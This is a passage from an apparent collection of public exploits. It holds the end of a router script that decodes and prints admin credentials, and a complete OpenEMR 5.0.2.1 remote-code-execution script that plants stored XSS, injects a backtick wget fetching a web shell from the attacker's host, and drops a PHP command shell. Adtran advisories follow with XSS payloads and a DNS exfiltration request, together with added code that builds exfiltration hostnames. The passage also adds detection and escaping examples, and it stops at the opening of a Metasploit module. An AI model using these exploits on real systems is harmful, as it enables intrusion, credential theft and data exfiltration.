    BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16 * 50]
    CONFIG_XML = cmsDecoder(BIN_CONTENT)
    USER_, PASS_ = "", ""
    for i in ADMIN_LOG_CFG.keys():
        if i in CONFIG_XML:
            CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:]
            PASS_ = CONFIG_XML[:CONFIG_XML.index(b'</')]
            USER_ = ADMIN_LOG_CFG[i]
            # Passwords are stored base64-encoded and NUL-padded inside the XML
            print("\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip(b'\x00').decode('latin-1')))
            return 0
    print("[-] Failed to decode the config file\n")
    return -1


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print("usage: python3 " + sys.argv[0] + " router_ip")
        print("example: python3 exploit.py 192.168.1.1")
        exit()
    print(r"""
     _ _                ___
    (~ )( ~)           / \_\ \/ /
     | D_ ]\ \/   -- By BenCh@li@h
     | D _]/\ \   -- BenChaliah@github
     \___/ / /\ \\
    (_ )( _)
    """)
    try:
        exploit(sys.argv[1])
    except Exception as e:
        print(str(e))
  9. # Exploit Title: OpenEMR 5.0.2.1 - Remote Code Execution
# Exploit Author: Hato0, BvThTrd
# Date: 2020-08-07
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.2.1/openemr-5.0.2.tar.gz/download
# Version: 5.0.2.1 (without patches)
# Tested on: Ubuntu Server 20.04.1 LTS, OpenEMR Version 5.0.2.1
# References:
# https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability?utm_medium=cpc&utm_source=twitter&utm_campaign=openemr&utm_term=security&utm_content=tofu
# https://www.youtube.com/watch?v=H8VWNwWgYJo&feature=emb_logo

#!/usr/bin/python3
WARNING = '''
===================================== WARNING =====================================
Please do not use for illegal purposes. It's for educational use only.
Please be on the good side.
===================================================================================
'''

import argparse
import http.server
import socketserver
import requests
from termcolor import colored
import json

OPENEMR_DIR = ""
RHOST = "127.0.0.1"
RPORT = 80
VHOST = ""
LHOST = "127.0.0.1"
LPORT = 4444
WPORT = 8080


def main():
    print(colored(WARNING, "red"))
    arguments()
    cookie1, cookie2 = init_session()
    jsonReceived, id = get_api(cookie1["OpenEMR"], cookie2["PortalOpenEMR"])
    write_payload_js()
    write_wshell()
    send_xss(id, cookie1["OpenEMR"], cookie2["PortalOpenEMR"], jsonReceived)
    if len(VHOST) > 0:
        print(colored("[+]", "green"), f'Your wshell is available at http://{VHOST}/{OPENEMR_DIR}interface/main/wshell.php?cmd=')
    else:
        print(colored("[+]", "green"), f'Your wshell is available at http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/main/wshell.php?cmd=')
    web_serv()


def arguments():
    parser = argparse.ArgumentParser(description='This exploit drops a web shell on an OpenEMR v5.0.2.1 CMS. At the end, GET the URL and run a netcat listener on LHOST:LPORT. You will be able to do Remote Code Execution on this server.')
    parser.add_argument("-d", "--directory", dest='directory', nargs='?', help="Root directory OpenEMR CMS")
    parser.add_argument("-rh", "--rhost", dest='rhost', help="Remote server IP", required=True)
    parser.add_argument("-rp", "--rport", dest='rport', nargs='?', help="Remote server PORT", type=int)
    parser.add_argument("-vh", "--vhost", dest='vhost', nargs='?', help="Remote server DOMAIN_NAME")
    parser.add_argument("-lh", "--lhost", dest='lhost', help="Reverse shell IP", required=True)
    parser.add_argument("-lp", "--lport", dest='lport', help="Reverse shell PORT", type=int, required=True)
    parser.add_argument("-wp", "--wport", dest='wport', nargs='?', help="Web Server PORT", type=int)
    args = parser.parse_args()
    if args.directory != None:
        global OPENEMR_DIR
        OPENEMR_DIR = str(args.directory)
        if OPENEMR_DIR[-1] != "/":
            OPENEMR_DIR += "/"
    if args.rhost != None:
        global RHOST
        RHOST = str(args.rhost)
    if args.rport != None:
        global RPORT
        RPORT = int(args.rport)
    if args.vhost != None:
        global VHOST
        VHOST = str(args.vhost)
    if args.lhost != None:
        global LHOST
        LHOST = str(args.lhost)
    if args.lport != None:
        global LPORT
        LPORT = int(args.lport)
    if args.wport != None:
        global WPORT
        WPORT = int(args.wport)


def host_headers():
    # Only send an explicit Host header when a virtual host name was given
    return {'host': VHOST} if len(VHOST) > 0 else {}


def init_session():
    # Step 1: the login page hands out an OpenEMR session cookie, the portal
    # registration page a PortalOpenEMR cookie; neither needs credentials
    r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/login/login.php?site=default', headers=host_headers())
    if r.status_code != 200:
        print(colored("[-]", "red"), f'An error occurred: {r.status_code} ==>\n{r.text}')
        exit(1)
    else:
        print(colored("[+]", "green"), f'Successfully set Session_Register=true with cookie OpenEMR:{r.cookies["OpenEMR"]}')
    cookies = {"OpenEMR": r.cookies["OpenEMR"]}
    r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/account/register.php', headers=host_headers(), cookies=cookies)
    if r.status_code != 200:
        print(colored("[-]", "red"), f'An error occurred: {r.status_code} ==>\n{r.text}')
        exit(1)
    else:
        print(colored("[+]", "green"), f'Successfully set Session_Register=true with cookie PortalOpenEMR:{r.cookies["PortalOpenEMR"]}')
    cookies2 = {"PortalOpenEMR": r.cookies["PortalOpenEMR"]}
    return (cookies, cookies2)


def get_api(cookieEMR, cookiePortal):
    # Step 2: with those cookies the patient-portal API lists users; pick the authorized (admin) one
    cookies = {"OpenEMR": cookieEMR, "PortalOpenEMR": cookiePortal}
    r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/users/', headers=host_headers(), cookies=cookies)
    if r.status_code != 200:
        print(colored("[-]", "red"), f'An error occurred: {r.status_code} ==>\n{r.text}')
        exit(1)
    parsed_json = json.loads(r.text)
    json_to_return, id = None, None
    for row in parsed_json['rows']:
        if row['authorized'] == str(1):
            print(colored("[+]", "green"), 'Found admin:')
            print(colored('\t[*]', 'yellow'), f'Id = {row["id"]}')
            print(colored('\t[*]', 'yellow'), f'Username = {row["username"]}')
            print(colored('\t[*]', 'yellow'), f'lname = {row["lname"]}')
            print(colored('\t[*]', 'yellow'), f'fname = {row["fname"]}')
            id = row['id']
            json_to_return = row
    if json_to_return is None:
        print(colored("[-]", "red"), 'No authorized (admin) user found in the API listing')
        exit(1)
    return (json_to_return, id)


def write_payload_js():
    # Step 3: JavaScript that runs in the admin's browser, fetches the CSRF token from
    # backup.php and submits a backup request whose form_sel_layouts[] value is
    # evaluated in a shell (backticks), fetching our webshell onto the server
    payload = "var xmlHttp = new XMLHttpRequest();\n"
    payload += "var token = window.location.href;\n"
    if len(VHOST) > 0:
        payload += "var mainUrl = 'http://{0}/{1}interface/main/tabs/main.php?token_main=';\n".format(VHOST, OPENEMR_DIR)
        payload += "var backUrl = 'http://{0}/{1}interface/main/backup.php';\n".format(VHOST, OPENEMR_DIR)
    else:
        payload += "var mainUrl = 'http://{0}:{1}/{2}interface/main/tabs/main.php?token_main=';\n".format(RHOST, RPORT, OPENEMR_DIR)
        payload += "var backUrl = 'http://{0}:{1}/{2}interface/main/backup.php';\n".format(RHOST, RPORT, OPENEMR_DIR)
    payload += "var cookieSet = 'OpenEMR=';\n\n"
    payload += "token = token.split('=')[1];\n\n"
    payload += "xmlHttp.open( 'GET', backUrl, false );\n"
    payload += "xmlHttp.send(null);\n\n"
    payload += "var response = xmlHttp.responseText;\n"
    payload += "var elemHTML = response.split(' ');\n"
    payload += "var csrf = '';\n\n\n"
    payload += "for(var i=0; i < elemHTML.length; i++)\n"
    payload += "{\n"
    payload += "\t if(elemHTML[i] == 'name=\"csrf_token_form\"')\n"
    payload += "\t {\n"
    payload += "\t\t csrf = elemHTML[i+1].split('=')[1].replace(/\"/g,'');\n"
    payload += "\t\t break;\n"
    payload += "\t }\n"
    payload += "}\n\n\n"
    payload += "var formData = new FormData();\n\n"
    payload += "formData.append('csrf_token_form', csrf);\n"
    payload += "formData.append('form_sel_lists[]', 'amendment_status');\n"
    payload += "formData.append('form_sel_layouts[]', '`wget http://{0}:{1}/wshell.php -O wshell.php;`');\n".format(LHOST, WPORT)
    payload += "formData.append('form_step', '102');\n"
    payload += "formData.append('form_status', '');\n\n"
    payload += "var request = new XMLHttpRequest();\n"
    payload += "request.open('POST', backUrl);\n"
    payload += "request.send(formData);\n"
    with open('payload.js', 'w') as fpayload:
        fpayload.write(payload)
    print(colored("[+]", "green"), 'Payload XSS written')


def write_wshell():
    with open('wshell.php', 'w') as fwshell:
        fwshell.write("<?php system($_GET['cmd']); ?>\n")
    print(colored("[+]", "green"), 'Wshell written')


def send_xss(id, cookieEMR, cookiePortal, jsonData):
    # Step 4: the same API lets us rewrite the admin's record; the lname field is
    # rendered unescaped in the admin UI, which is where payload.js gets loaded
    cookies = {"OpenEMR": cookieEMR, "PortalOpenEMR": cookiePortal}
    jsonData["lname"] = "<script src='http://{0}:{1}/payload.js'> </script>".format(LHOST, WPORT)
    jsonData["cpoe"] = 1
    jsonData["source"] = 1
    jsonData.pop("id", None)
    data = json.dumps(jsonData, indent=4)
    r = requests.put(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/user/{id}', headers=host_headers(), cookies=cookies, data=data)
    print(colored("[+]", "green"), 'Stored XSS dropped')


def web_serv():
    # Serves payload.js and wshell.php from the current directory to the victim
    Handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", WPORT), Handler) as httpd:
        print(colored("[+]", "green"), f'HTTP Simple Server running at localhost PORT {WPORT}')
        httpd.serve_forever()


if __name__ == "__main__":
    main()
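
The chain above leaves a recognisable trail in the web server's access log, and this added example (not part of the post, and not OpenEMR code) shows the correlation a responder would run over it: per source address, a hit on the unauthenticated portal registration page, then the portal API user listing, then a PUT or POST to a single user record is the stored-XSS stage; any request to the dropped wshell.php is the post-exploitation stage. The log lines are constructed to mirror the requests the script makes; the Apache combined format regex and the webshell file name (the script's default) are this example's assumptions.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed Apache combined-log lines (not real traffic) modelling the chain above.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Aug/2020:10:00:01 +0000] "GET /openemr/interface/login/login.php?site=default HTTP/1.1" 200 5120 "-" "python-requests/2.24.0"
203.0.113.7 - - [07/Aug/2020:10:00:02 +0000] "GET /openemr/portal/account/register.php HTTP/1.1" 200 8200 "-" "python-requests/2.24.0"
203.0.113.7 - - [07/Aug/2020:10:00:03 +0000] "GET /openemr/portal/patient/api/users/ HTTP/1.1" 200 1200 "-" "python-requests/2.24.0"
203.0.113.7 - - [07/Aug/2020:10:00:04 +0000] "PUT /openemr/portal/patient/api/user/1 HTTP/1.1" 200 300 "-" "python-requests/2.24.0"
198.51.100.20 - - [07/Aug/2020:10:15:30 +0000] "POST /openemr/interface/main/backup.php HTTP/1.1" 200 900 "http://emr.example/openemr/interface/main/backup.php" "Mozilla/5.0"
198.51.100.20 - - [07/Aug/2020:10:15:31 +0000] "GET /openemr/interface/main/wshell.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
192.0.2.9 - - [07/Aug/2020:11:00:00 +0000] "GET /openemr/portal/account/register.php HTTP/1.1" 200 8200 "-" "Mozilla/5.0"
"""

PORTAL_REGISTER = "/portal/account/register.php"
PORTAL_USERS_LIST = "/portal/patient/api/users/"
PORTAL_USER_WRITE = re.compile(r"/portal/patient/api/user/\d+$")
BACKUP_PAGE = "/interface/main/backup.php"
WEBSHELL_NAME = "/interface/main/wshell.php"   # the PoC's default drop name (assumption)


def parse(log_text: str):
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def detect(log_text: str) -> list:
    """Return (source_ip, finding) pairs. Registration alone is normal portal use;
    only the full register -> list users -> write user sequence is reported."""
    findings = []
    stage = defaultdict(set)   # ip -> chain steps already seen from that address
    for rec in parse(log_text):
        ip, method = rec["ip"], rec["method"]
        path = rec["path"].split("?")[0]
        if path.endswith(PORTAL_REGISTER):
            stage[ip].add("register")
        elif path.endswith(PORTAL_USERS_LIST) and "register" in stage[ip]:
            stage[ip].add("listed")
        elif PORTAL_USER_WRITE.search(path) and method in ("PUT", "POST") and "listed" in stage[ip]:
            findings.append((ip, "portal user record modified via API after self-registration"))
        if path.endswith(BACKUP_PAGE) and method == "POST":
            findings.append((ip, "POST to backup.php: legitimate for admins, review form_sel_layouts[] for shell metacharacters"))
        if path.endswith(WEBSHELL_NAME):
            findings.append((ip, "request to dropped webshell wshell.php"))
    return findings


if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG):
        print(ip, "-", finding)
```

On the sample, the python-requests client is reported once for the API write, the second address for the backup POST and the webshell hit, and the third address, which only loaded the registration page, is not reported.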
10. # Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25679

# CVE-2021-25679 - Adtran Personal Phone Manager Authenticated Stored XSS in Change Email Address Form

--Summary--
The AdTran Personal Phone Manager software is vulnerable to authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below, but potentially impact later versions as well, since they have not previously been disclosed. Only version 10.8.1 could be confirmed during primary research.

ADTRAN, Inc
https://adtran.com

--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended that impacted users update to an actively supported appliance.

--Details--
The AdTran Personal Phone Manager software is vulnerable to authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below, but potentially impact later versions as well, since they have not previously been disclosed. Only version 10.8.1 could be confirmed during primary research.

These issues work by passing a basic XSS payload to vulnerable POST parameters that are rendered in the output without sanitization. Since the forms require authentication to access, these issues cannot be exploited without credentials.

This can allow for several issues, including but not limited to:
- Hijacking another user's session
- Modifying a user's configuration settings
- Using XSS payloads to capture input (keylogging)

-- Proof of Concept --
The following form was impacted and can be exploited with the sample payload provided below:
- https://example.com/userapp/userSettingsAction.html - POST - formAction=changeEmailAddress&emailAddress=+data%22%3E%3Cscript%3Ealert%60document.cookie%60%3C%2Fscript%3E+&emailAddress2=&emailApply=Apply+Changes

The vulnerable parameters that were identified are:
- emailAddress
- emailAddress2

--Mitigation--
Sanitize any user-controlled input in both form fields and URL parameters, encoding the data so it is not rendered as arbitrary HTML/JavaScript.

--Timeline--
- 1/21/2021: XSS vulnerability was discovered and documented. A temporary CVE identifier was requested from MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90-day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25679 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted, so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The researcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such, AdTran would not be investigating the issues, leaving the details of the findings as is. The researcher responded with acknowledgement of the decision and requested support to proceed with full disclosure outside of the previously established 90-day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not proceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write-ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
11. # Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25680

# CVE-2021-25680 - Adtran Personal Phone Manager Multiple Reflected XSS

--Summary--
The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below, but potentially impact later versions as well, since they have not previously been disclosed. Only version 10.8.1 could be confirmed during primary research.

ADTRAN, Inc
https://adtran.com

--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended that impacted users update to an actively supported appliance.

--Details--
The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below, but potentially impact later versions as well, since they have not previously been disclosed. Only version 10.8.1 could be confirmed during primary research.

These issues work by passing a basic XSS payload to vulnerable GET parameters that are reflected in the output without sanitization.

This can allow for several issues, including but not limited to:
- Hijacking a user's session
- Modifying a user's configuration settings
- Using XSS payloads to capture input (keylogging)

-- Proof of Concept --
The following URL parameters were impacted and can be exploited with the sample payloads provided below:
- https://example.com/userapp/userSettings.html?emailSuccessMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
- https://example.com/userapp/phoneSettings.html?successMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
- https://example.com/userapp/phoneSettingsAction.html?formAction=&callForwardingFlag=1&callForwardNumber=SOMEDATA"><script>alert`XSS`</script>&apply=Apply Changes
- https://example.com/userapp/directoriesAction.html?formAction=applySpeedDialChanges&callEntryToDelete=&newSpeedDialName(1)=&newSpeedDialNumber(1)=&newSpeedDialName(2)=&newSpeedDialNumber(2)=&newSpeedDialName(3)=&newSpeedDialNumber(3)=&newSpeedDialName(4)=&newSpeedDialNumber(4)=&newSpeedDialName(5)=&newSpeedDialNumber(5)=&newSpeedDialName(6)=&newSpeedDialNumber(6)=&newSpeedDialName(7)=&newSpeedDialNumber(7)=&newSpeedDialName(8)=&newSpeedDialNumber(8)=&newSpeedDialName(9)=&newSpeedDialNumber(9)=&newSpeedDialName(10)=&newSpeedDialNumber(10)=&newSpeedDialName(11)=&newSpeedDialNumber(11)=&newSpeedDialName(12)=&newSpeedDialNumber(12)=SOMEDATA<script>alert`XSS`</script>&newSpeedDialName(13)=&newSpeedDialNumber(13)=&newSpeedDialName(14)=&newSpeedDialNumber(14)=&newSpeedDialName(15)=&newSpeedDialNumber(15)=&newSpeedDialName(16)=&newSpeedDialNumber(16)=&newSpeedDialName(17)=&newSpeedDialNumber(17)=&newSpeedDialName(18)=&newSpeedDialNumber(18)=&newSpeedDialName(19)=&newSpeedDialNumber(19)=&newSpeedDialName(20)=&newSpeedDialNumber(20)=&applySpeedDialChanges=Apply

The vulnerable parameters that were identified impact more pages than just the above. Any page that renders a response using the following parameters is impacted by this issue:
- emailSuccessMessage
- successMessage
- callForwardNumber
- newSpeedDialNumber(#)

--Mitigation--
Sanitize any user-controlled input in both form fields and URL parameters, encoding the data so it is not rendered as arbitrary HTML/JavaScript.

--Timeline--
- 1/21/2021: XSS vulnerabilities were discovered and documented. A temporary CVE identifier was requested from MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90-day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25680 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted, so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The researcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such, AdTran would not be investigating the issues, leaving the details of the findings as is. The researcher responded with acknowledgement of the decision and requested support to proceed with full disclosure outside of the previously established 90-day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not proceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write-ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
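The two Adtran advisories above (CVE-2021-25679 stored, CVE-2021-25680 reflected) both come down to a parameter being pasted into the page without output encoding. The following is an added example, not code from the advisories or from Adtran: it URL-decodes the PoC request bodies exactly as given, then renders the decoded value two ways, as the vulnerable pages do (raw) and as the mitigation section asks (HTML-encoded). The two markup templates are assumptions standing in for the appliance's templates, which are not on the page.

```python
"""Decode the Adtran PoC parameters and compare raw vs. HTML-encoded rendering.
Added example; the templates are assumed, the PoC strings are the advisories'."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# PoC request body from CVE-2021-25679 and PoC URL from CVE-2021-25680 (host is a placeholder).
STORED_POST_BODY = (
    "formAction=changeEmailAddress"
    "&emailAddress=+data%22%3E%3Cscript%3Ealert%60document.cookie%60%3C%2Fscript%3E+"
    "&emailAddress2=&emailApply=Apply+Changes"
)
REFLECTED_URL = (
    "https://example.com/userapp/userSettings.html"
    "?emailSuccessMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
)

# Assumed markup: the stored value lands in an input attribute, the reflected one in a status div.
EMAIL_TEMPLATE = '<input name="emailAddress" value="{value}">'
MSG_TEMPLATE = '<div class="status">{value}</div>'


def decode_params(query: str) -> dict:
    """URL-decode a form body or query string into {name: first_value} ('+' becomes a space)."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_unsafe(template: str, value: str) -> str:
    """How the vulnerable pages behave: the parameter is interpolated as-is."""
    return template.replace("{value}", value)


def render_safe(template: str, value: str) -> str:
    """Hardened rendering: HTML-encode first; quote=True also encodes ' and " so the
    attribute case cannot be broken out of."""
    return template.replace("{value}", escape(value, quote=True))


def contains_markup(rendered: str) -> bool:
    """True if the payload survived as a live script tag."""
    return "<script>" in rendered.lower()


def demo() -> dict:
    """Render both PoC values both ways and return the four results."""
    stored = decode_params(STORED_POST_BODY)["emailAddress"]
    reflected = decode_params(urlsplit(REFLECTED_URL).query)["emailSuccessMessage"]
    return {
        "stored_unsafe": render_unsafe(EMAIL_TEMPLATE, stored),
        "stored_safe": render_safe(EMAIL_TEMPLATE, stored),
        "reflected_unsafe": render_unsafe(MSG_TEMPLATE, reflected),
        "reflected_safe": render_safe(MSG_TEMPLATE, reflected),
    }


if __name__ == "__main__":
    for name, markup in demo().items():
        print(f"{name:17} live script? {contains_markup(markup)!s:5} {markup}")
```

Note that the stored payload begins with `"><`, which closes the `value` attribute before opening the script tag; that is why the encoder must cover quotes as well as angle brackets.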
12. # Exploit Title: Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration
# Date: 1/21/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home
# Version: v10.8.1
# Tested on: NetVanta 7060 and NetVanta 7100
# CVE : CVE-2021-25681

# CVE-2021-25681 - AdTran Personal Phone Manager DNS Exfiltration

--Summary--
The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS.

ADTRAN, Inc
https://adtran.com

--Affects--
- AdTran Personal Phone Manager
- Verified on v10.8.1
- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended that impacted users update to an actively supported appliance.

--Details--
The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. This is achieved by simply making a GET request to the vulnerable server containing a reference to a DNS target that is collecting the tunneled data.

This can lead to:
- Utilizing exposed AdTran Personal Phone Manager services as a redirector for DNS-based command and control
- Utilizing exposed AdTran Personal Phone Manager services as a redirector for DNS-based arbitrary data exfiltration

-- Proof of Concept --
To exploit the issue, all that is necessary is a single HTTP request whose absolute-form target names the attacker's DNS zone; the server resolves it even though the Host header names the appliance:

GET http://mydns.attack.com/ HTTP/1.1
Host: SOME ADTRAN HOST HERE
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close

--Mitigation--
The server should be reconfigured not to perform arbitrary DNS lookups when the Host header and the request target do not match. Additionally, scoping requests so that only those in the context of the application are allowed is ideal.

--Timeline--
- 1/21/2021: DNS exfiltration vulnerability was discovered and documented. A temporary CVE identifier was requested from MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90-day disclosure timeline was established in the initial communication.
- 1/22/2021: Placeholder CVE-2021-25681 was assigned by MITRE.
- 1/29/2021: A response from AdTran's Product Security Team was received.
- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted, so a request was made to resend the data.
- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The researcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such, AdTran would not be investigating the issues, leaving the details of the findings as is. The researcher responded with acknowledgement of the decision and requested support to proceed with full disclosure outside of the previously established 90-day timeline.
- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not proceed with disclosure until further notice.
- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details.
- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed.
- 3/3/2021: The researcher begins constructing a private repository to prepare the write-ups for release.
- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.
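The advisory shows a single lookup; what makes it a tunnel is that the attacker controls the hostname the appliance resolves. The block below is an added example, not code from the advisory or from Adtran. It goes one step beyond the PoC on the sending side (encoding arbitrary bytes into DNS labels under a collector zone, with a sequence number so the collector can reorder) and adds the check a reverse proxy or log reviewer would apply on the defending side: flag any absolute-form request target whose host does not match the Host header, which is the exact shape of the PoC. All host and zone names are placeholders.

```python
"""DNS-label exfil framing and an absolute-form/Host mismatch check.
Added example built around the CVE-2021-25681 PoC; names are placeholders."""
import binascii

MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # practical limit for a full name


def exfil_names(data: bytes, zone: str, max_labels: int = 3) -> list:
    """Hex-encode data and split it into DNS names under `zone`. Each name carries
    a sequence number as its first label, then up to max_labels labels of data."""
    hexdata = binascii.hexlify(data).decode()
    chunk = MAX_LABEL * max_labels
    names = []
    for seq, i in enumerate(range(0, len(hexdata), chunk)):
        part = hexdata[i:i + chunk]
        labels = [part[j:j + MAX_LABEL] for j in range(0, len(part), MAX_LABEL)]
        name = ".".join([str(seq), *labels, zone])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; lower max_labels")
        names.append(name)
    return names


def build_probe(dns_name: str, appliance_host: str) -> bytes:
    """The request shape from the PoC: absolute-form target, unrelated Host header."""
    return (
        f"GET http://{dns_name}/ HTTP/1.1\r\n"
        f"Host: {appliance_host}\r\n"
        "Pragma: no-cache\r\n"
        "Cache-Control: no-cache, no-transform\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def absolute_form_mismatch(raw: bytes):
    """Return (target_host, host_header) when the request line uses an absolute-form
    target whose host differs from the Host header; None for origin-form or matching."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode(errors="replace")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    target = parts[1]
    if "://" not in target:
        return None  # origin-form request: nothing to compare
    target_host = target.split("://", 1)[1].split("/", 1)[0].split(":")[0]
    host_header = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            host_header = value.strip().split(":")[0]
            break
    if target_host.lower() != host_header.lower():
        return target_host, host_header
    return None


if __name__ == "__main__":
    names = exfil_names(b"secret", "mydns.attack.com")
    probe = build_probe(names[0], "adtran.example.internal")
    print(probe.decode())
    print("mismatch:", absolute_form_mismatch(probe))
```

A server that honours absolute-form targets should still only resolve hosts it is configured to serve; the mismatch check above is the cheapest way to spot the PoC in proxy logs until that is the case.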
13. ```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GravCMS Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary config write/update vulnerability to achieve remote code
